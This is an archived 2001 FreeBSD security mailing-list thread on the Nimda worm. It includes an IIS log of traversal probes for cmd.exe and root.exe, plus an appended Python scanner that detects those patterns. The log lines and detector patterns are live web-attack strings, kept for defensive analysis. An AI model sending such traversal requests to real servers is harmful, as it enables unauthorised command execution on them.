Date: Tue, 18 Sep 2001 14:54:36 -0700
From: "John Howie" <JHowie@msn.com>
To: "Derek O'Flynn" <derekoflynn@hotmail.com>, <freebsd-security@FreeBSD.ORG>, "Brett Glass" <brett@lariat.org>
Subject: Re: NIMDA Virus
Message-ID: <010a01c1408c$82bf0380$0101a8c0@development.local>
References: <4.3.2.7.2.20010918153412.0493bc10@localhost>
Probably not enough - the Hydra (two-heads) is also doing NetBIOS queries. The example log below shows the entire attack from an IIS standpoint. I have no example of the NetBIOS attack pattern because we haven't been infected.

john...

2001-09-18 13:21:25 216.210.XXX.XXX- 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -

----- Original Message -----
From: "Brett Glass" <brett@lariat.org>
To: "Derek O'Flynn" <derekoflynn@hotmail.com>; <freebsd-security@FreeBSD.ORG>
Sent: Tuesday, September 18, 2001 2:39 PM
Subject: Re: NIMDA Virus

> We just put a log monitor on the Apache server, and are firewalling anything
> that sends a request with "cmd.exe" in it. Quite effective.
>
> --Brett
>
> At 03:31 PM 9/18/2001, Derek O'Flynn wrote:
>
> >Has anyone successfully written a rule for snort to alert to this?
> >
> >I'm currently running snort 1.8 with flex-resp.
> >
> >I would like to have a rule that identifies the attacks and then sends the tcp_rst command so that the worm can't infect new machines. I have the information for the rule, just need to know what to put in the content field to verify that it is nimda.
> >
> >Thanks,
> >Derek O'Flynn
> >
> >_________________________________________________________________
> >Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?010a01c1408c$82bf0380$0101a8c0>
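As an added detection example (not code from the thread or from any of its participants): a small Python scanner that parses IIS log lines in the field layout John posted, percent-decodes the request path, and tags the probe patterns visible in his log, namely requests for root.exe or cmd.exe and ".." traversal written with %5c, %2f or the non-ASCII separator. It also includes the plain "cmd.exe" substring test Brett describes, so the two can be compared on the same input. The sample log, the tag names, the benign client 10.0.0.7 and the per-source threshold are constructed for the example; the XXX octets are placeholders as in the original.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in the same field layout as the IIS log in the thread:
# date time c-ip - s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status -
# The XXX octets are placeholders, and 10.0.0.7 is a made-up benign client.
SAMPLE_LOG = """\
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:22:01 10.0.0.7 - 192.168.1.251 80 GET /index.html - 200 -
2001-09-18 13:22:03 10.0.0.7 - 192.168.1.251 80 GET /images/logo.gif - 200 -
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<cip>\S+) - (?P<sip>\S+) (?P<port>\d+) "
    r"(?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d+) -$"
)

# Indicator set (assumed for this example): the two executables requested in
# the posted log, and ".." followed by a separator, either a slash/backslash
# after percent-decoding or the non-ASCII bytes seen in the ..Á../ form.
TARGET_EXES = ("cmd.exe", "root.exe")
TRAVERSAL_RE = re.compile(r"\.\.(?:[\\/]|[^\x00-\x7f]+)")


def naive_cmd_filter(line):
    """The substring test the Apache log monitor in the thread relies on."""
    return "cmd.exe" in line.lower()


def classify_request(stem):
    """Tag one URI stem; an empty list means nothing Nimda-like was seen."""
    decoded = unquote(stem)
    tags = []
    if decoded.lower().endswith(TARGET_EXES):
        tags.append("shell-exe")
    if TRAVERSAL_RE.search(decoded):
        tags.append("traversal")
        if decoded != stem:
            tags.append("encoded-separator")  # separator arrived as %xx
    return tags


def parse_line(line):
    """Split one log line into fields, or return None if it does not fit."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["status"] = int(rec["status"])
    return rec


def scan_log(text, threshold=3):
    """Count tagged requests per client and flag clients at or above threshold.

    Status codes are deliberately ignored: the posted log shows 404 and 500
    responses for the same scan, and either one still records a probe."""
    per_ip = defaultdict(lambda: {"probes": 0, "tags": set(), "flagged": False})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify_request(rec["stem"])
        if tags:
            entry = per_ip[rec["cip"]]
            entry["probes"] += 1
            entry["tags"].update(tags)
    for entry in per_ip.values():
        entry["flagged"] = entry["probes"] >= threshold
    return dict(per_ip)


if __name__ == "__main__":
    for ip, entry in scan_log(SAMPLE_LOG).items():
        print(ip, entry["probes"], sorted(entry["tags"]), "FLAGGED" if entry["flagged"] else "")
    # Probe lines that the plain "cmd.exe" substring test does not see:
    for line in SAMPLE_LOG.splitlines():
        rec = parse_line(line)
        if rec and classify_request(rec["stem"]) and not naive_cmd_filter(line):
            print("missed by substring filter:", rec["stem"])
```

Run it on the sample and the scanning source is flagged after its third tagged request, while the benign client never appears in the result. The closing loop shows the gap in a "cmd.exe"-only filter that the posted log itself documents: the first two probes of the sequence ask for root.exe, so a monitor keyed on that one string sees nothing until the third request. Matching after percent-decoding is what lets one rule cover the %5c and %2f spellings of the same traversal.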